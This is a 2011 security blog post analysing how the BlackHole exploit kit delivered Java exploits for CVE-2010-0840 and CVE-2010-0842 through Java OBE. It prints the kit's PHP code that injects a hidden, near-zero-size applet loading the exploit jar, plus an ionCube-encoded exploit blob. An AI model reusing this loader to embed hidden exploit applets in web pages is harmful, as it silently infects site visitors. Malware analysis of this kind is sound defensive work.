Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising



BlackHole exploit pack is showing heavy increase in malware infections across web. The interesting fact that BlackHole presents is the use of Java OBE (Open Business Engine) in spreading exploits and successfully loading the malicious executable in the victim machine.

What is OBE?
:"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here

However, BlackHole is using fully functional Java OBE Toolkit in order to exploit plethora of systems. Our latest analysis unleash this point that Java OBE holds the maximum rate of successfully exploiting the targets. BlackHole exploit pack shows this behavior where Java OBE Toolkit is devastating victim machines at rapid pace than any other exploits.

The exploit served by Java OBE is the CVE-2010-0840 and CVE-2010-0842

As stated by Zero Day Initiative: Authentication is not required to exploit this vulnerability.The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges,Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege.

BlackHole exploit pack uses following PHP code to link to the exploit
?php
include_once 'config.php';
echo ' Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"
PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">
/applet>';
?


Th exploit is encodes with PHP IonCube encoder as follows

?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');$__oid=$__id=realpath(ini_get('extension_dir'));
$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).
$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo
('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>

4+oV54zQTAi0e4oDtExXY1DjnASpODJTLQWezUOr9eSc/QY6HTb4vd+rZpF1HHTh0Khql7iEBD8o
iHXqZlUSsNYne9MWqG5vGyPF8ndLDo/Ctc2nWyKPRPmYovkVWIhmzruI9fbg2mVjfc84zaSvSFuN
zXKHmSbl+AoJo6UChrvdCB8b2wQEepAhplIZW1fEX5jdI73K0aILHly7rmYA0DxVC7IIG81zhT37
quMA5arzCs3LYUshSwjHlbWT63Un0It0T59cuYZxSlhY3osq1fqGxeAlzJ/8gMXCr8bMvhQ00VcE
sLkaLKgxBf9elSC4pPQ8yN4Ajtbk63NI1k/VPoN8c1bogVgD81STXlMlcnXV/BhsGcj0EcM4nRav
twLKKBIHXDqgVWQOpFvlhumeM9KLQu6bbOuZYYos/tOsCLyRauiChV8vQdWndia8XGK7bjoc9vri
RwDG5R4I+LYhp1ajtvbfoWafYMD+tJcMtwn+GGkNDWEa8SDhrYc5foPERsptZDbduKlXIfmuKHMs
i3iBo4o9ncsSSRIm2EwrrqG9GoWRfOeTMaCQFKHMrRH3xK+GTe9sMDLsC3bWMfeU1/js8nAMshnJ
uD3JEvPvENBByeVjawcuITCXUi7us4RQ7xlPaUgQ5zn8KleXH30qErLCyu1+imafdPVFbvhyj0B6
owIoTC0eVD2/qF2A5MMQOJ86uSyn+TU7zL39Xak43NVE8K7pFi+PSYPqXKMFPu4gZuNy97fZxnJu
X5nENhyhotklpg3Qt9yabDVdSDSDFZyV4BHH17w5uAj7eEj7uupXU0JlnYccdhU1O65Ncy2lhUjW
JSC4a36ucKA/xgssB+JqZ3AUZjdH4Jwn89HfexDfcN9tkBDQ9KcWVJJ3hm+HYvW98yc3pOkYOb8S
2HG1AqKLoe7Hs5F3IQT5gS2Vy4iZjVNMj6ZHrpFZ7PNg/Bmhs11Ihz7MBk3uqdamXcSNzb4DvTIN
7pGIMBaMw84Px89GKeKJFJz9xGk5RPtIJehUf7xm64zbGJNyA5XkStpph7OF0eXL6vKTUnEuvwWV
sK0qf/ssfSdC9C5bABVnxZRi6Ehf4Ss7pizy8U417HVSeaYHrFUGtnUifK41MkJMBH7TlccNm7fP
0yAslR7TMtcjkTD9RC1LjjfTTLocpsYSH2pKSVaa/MqMr0jPyafCZrv5qkwlgWOlKvlUDwussRUp
p7bP6MsCw7bCVFHg5S5fjb/W9AxdK9H51aNeotbWAj6ht/wodBNqG/mN9MmB9ejBWC3HnrXTHwkI
R6jKOIbHEk3d1A50RjL0L93EtCVUaJv2GpIyYsKIsWNuc00JdXifz4vvKttF1S929jzbaWq7wAyk
uHu3SmmjBkQ+wDLIR6ghdwCVspTpbb6IiFYWYKjhFmxeOsQ2tuieEG6CRMbm0hZsuwwUrrtKEZ5r
JaQqtN2zSVpAXfQMYf/vACAZdbdroX17DgDLDWz/lpWSTGbQlCPteycgmgNn9J3PAkSkXwY81PNU
0WBSbxSP6s80Q4lye1IbFfltV/Doyw5HFR+vF+vGUzcepkPif58TruwNlFt4jFuj/6+SosDV4xn9
wnYf+KjWw95keiR5zBaFd194ens3GdmLibpooN4=


This exploit can be found in the wild on the World Wide Web. During our analysis, exploit specific stats are checked for the infected domain hosting BlackHole exploit pack. The comparative ratio is presented below



This scenario shows the ease of exploiting Java open engine.In this, only BlackHole exploit pack is analyzed, what about other exploit packs. It seems like Java is becoming the preferred base for exploitation because of platform independent nature.